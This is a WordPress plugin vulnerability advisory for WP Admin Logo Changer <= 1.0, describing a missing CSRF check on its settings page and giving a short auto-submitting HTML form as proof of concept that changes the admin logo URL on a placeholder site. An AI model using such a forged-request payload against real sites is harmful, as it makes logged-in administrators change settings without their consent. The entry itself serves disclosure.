WordPress Plugin Vulnerabilities
WP Admin Logo Changer <= 1.0 - Plugin's Settings Update via CSRF
Description
The plugin does not have CSRF check when saving its settings, which could allow attackers to make a logged in admin update them via a CSRF attack.
Proof of Concept
<form action="https://example.com/wp-admin/options-general.php?page=wp_admin_logo_changer_dashboard" method="post" id="csrf"> <input type="hidden" name="save_logo" value="1"> <input type="hidden" name="image_url" value="https://upload.wikimedia.org/wikipedia/commons/e/e8/DID_U_ASK_4_MOAR_KINDESS_ON_WIKIPEDIA.jpg"> </form><script>csrf.submit()</script>
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-11-15 (about 2 years ago)
Added
2021-11-15 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)